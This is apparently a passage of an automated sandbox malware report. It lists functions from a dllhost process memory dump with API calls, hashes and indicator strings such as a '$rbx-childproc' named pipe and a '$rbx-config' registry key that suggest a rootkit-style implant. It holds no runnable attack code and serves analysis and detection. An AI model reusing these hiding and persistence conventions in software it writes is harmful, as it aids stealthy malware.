                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 698dd766ebe74dda75e47ca79a564a8c6d126b2508e645fa3356eb86d4cfa06a
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 37419033214B80DAE764CF21E44879EF7A1F388B99F448129DB8907B68DF78C599CB50
                                            Function 0000020175EE2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: eeceaa4c9c0750c3ec001b4930876f86dd6fb1f8c93308f392b0d99a6d5582be
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 67117932628B4082F7508F21F41835AF760F388BE4F940315EA9902AE9DFBDC269CB44
                                            Function 0000020175EB2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 25a8fa04c9e510b5beb4a0bd7edefcb8d0bea2f1da315196ea9bdc755dc31701
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 32115B32614B4083E7108F21F41976AF761F789BD5F940315EA9942BA9CFBCC269CB40
                                            Function 0000020175E87050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 6420d284b2dd80b0e63b7e9612f9f1f15acd3ace0d83d0636dbd862d679f8764
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: ED812521A8034186FB50AB65984D39DE2E1AB86780F446035AD49477B3DFFAEBF6C701
                                            Function 0000020175EE7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: ae3e29faa0583e8bdd0b0850a0d15489fd8ef397a0e95ee2ca2fc8b3b6cf7195
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: E881F7606247C146FB50AB65984D369E394AB9E784F484035EA48473F7EFF8CB72E300
                                            Function 0000020175EE9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9B31
                                            • GetLastError.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9B69
                                            • FreeLibrary.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9BD7
                                            • GetProcAddress.KERNEL32(?,?,?,0000020175EE9C6B,?,?,?,0000020175EE945C,?,?,?,?,0000020175EE8F65), ref: 0000020175EE9BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: e0ff2c360697ce4364d8f03b9f9f0727be581fefe44467832d29afe931ce7191
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: C031C121322B4081FF529B02A8087A5E3D5BB5CBE0F590625ED1D8B7A6EFB8C664D304
                                            Function 0000020175EB9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9B31
                                            • GetLastError.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9B69
                                            • FreeLibrary.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9BD7
                                            • GetProcAddress.KERNEL32(?,?,?,0000020175EB9C6B,?,?,?,0000020175EB945C,?,?,?,?,0000020175EB8F65), ref: 0000020175EB9BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: 4144f1c8154a2cd595ff6df125308f8b7bd36a0b93b69aadaefae46ac8bfbf79
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: C431E631312B44C1EF119B069888BA5F3A5FB44BE1F590625ED1D8B7B2EFB8C664C324
                                            Function 0000020175EF3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 9731a4ea26dd46b7a2b3c470ac8a557678bb1ecda8c450b4ea16737dd08f0b2e
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: BF116D31310B5086E7908F52E858719E7A4F798BE4F444225EA5E87BE5DFB8CA24C744
                                            Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Delete$CloseEnumOpen
                                            • String ID: SOFTWARE\$rbx-config
                                            • API String ID: 3013565938-3990243012
                                            • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                            • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                            • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                            • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                            Function 0000020175EE6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: a91be25266190429ed207ecc44afeedc7aa0bcdc5925fb9ec615f25929a1a9a4
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: A6D18A76214B8881EB709B1AE49835AF7A4F38CB88F540516EACD477B6DF7CC661DB00
                                            Function 0000020175EB6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 70d9181fb4961d94369b1eeb1472e4a009a25c088f37b852dc06778e98ae3e85
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 2AD19D36209B8885DB70DB0AE49875AF7A1F3C8B89F140116EACD4777ADF78C661CB10
                                            Function 0000020175EE2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 7516ff49dcbe5eaafc1dd9bfc23c12edfd91ae01ca74b1af3b9263db5d7cdc34
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: E351C231221F4595FB15EF24EC586A8E3A1BB08754F84481AE92D067B7EFB8D738D380
                                            Function 0000020175EB2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 17c99371b402209796be629e99f2e906a23f8cd76dafebe42ba755844e62658b
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 51510B31201F8995EF19DF28E858A98E3A1FB04746F840816A52D067B7EFF5D778C3A0
                                            Function 0000020175EE35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 2b20bd72820d89394c7d9bc9375efcefa42d1c3e4bf74fc674dc2e40480fc4f7
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 70319E32711B5A82FB54DF26A548669E3A0BB5DF84F0840208F4807BB6EFB4E6B1D700
                                            Function 0000020175EB35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: badcf454c96f7c7205424c66f360620224cafc0cbe2cfda4e1b6a66d9694948d
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 2F31A332701B5987EB15DF16E549B69E3A0FB48B85F0840208F4907B7AEFB4C6B5C750
                                            Function 0000020175EEC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 71225ee2ce45be8f7ed297cd954a08d16c930abf1de484e2ec0ca2ff4853779e
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 0011862132074042FB546731691D36EE251AB8C790F985625E86E5B3FBDFB8D771E300
                                            Function 0000020175EBC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 20473cc48c2304b5e37bb2cbd89b1eb95322a10b6f4095b4819abbfe2931133a
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 8311C62130434242FF586B31681DB7ED241AB84791F546634E86A567F7DFB8C7A1C330
                                            Function 0000020175EE1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 0c7aa5ad9ef5d0eebdc56560e5c6b1d7c474c4b6b68d98fe7d942648311e42f6
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: F0016921B10B4082EB54DB12A858759E3A1FB98FC0F884036DE9D437A5DFBCCB95C780
                                            Function 0000020175EB1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 907ac269bce594cc729a65393bb6c92895318ec4f5ad4c8481ffcb949a6d3766
